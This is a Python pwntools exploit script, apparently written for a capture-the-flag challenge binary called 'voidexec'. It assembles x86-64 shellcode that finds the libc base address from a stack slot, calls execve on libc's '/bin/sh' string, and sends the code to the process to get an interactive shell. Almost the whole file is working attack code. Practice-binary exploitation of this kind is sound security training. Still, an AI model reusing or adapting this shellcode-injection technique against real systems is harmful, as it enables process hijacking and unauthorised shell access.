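#!/usr/bin/python3
"""pwntools harness for the ``voidexec`` challenge binary.

Spawns the target, assembles a short stub and sends it to the process.
The stub reads one stack slot, subtracts a fixed libc offset to recover
the libc load address, and calls ``execve`` on libc's ``"/bin/sh"``
string with argv and envp both NULL (rsi/rdx are zeroed first).

Requires pwntools, ``./voidexec`` in the working directory, and a libc
that ``ELF.libc`` can resolve (``target.libc`` is None otherwise and the
symbol lookups below fail).
"""
from pwn import *

# The binary sets arch/OS for asm(); checksec output is suppressed.
context.binary = target = ELF("./voidexec", checksec=False)
libc = target.libc

r = process()

# Offsets are resolved from the local libc and baked into the stub at
# assembly time, so the stub is only valid against this exact libc build.
# They are computed outside the f-string on purpose: the b"/bin/sh\0"
# literal contains a backslash, which is a SyntaxError inside an f-string
# expression on Python < 3.12.
start_main_off = libc.sym.__libc_start_call_main + 128
binsh_off = next(libc.search(b"/bin/sh\0"))
execve_off = libc.sym.execve

# [rsp+32] is assumed by the author to hold a return address into
# __libc_start_call_main+128 at the moment the stub runs -- TODO confirm;
# with any other frame layout r9 is garbage and the call faults.
shellcode_src = f"""
    xor rsi, rsi
    xor rdx, rdx
    mov r9, [rsp+32]
    sub r9, {start_main_off}
    mov rdi, r9
    add rdi, {binsh_off}
    mov r15, r9
    add r15, {execve_off}
    call r15
"""
shellcode = asm(shellcode_src)

r.send(shellcode)
r.interactive()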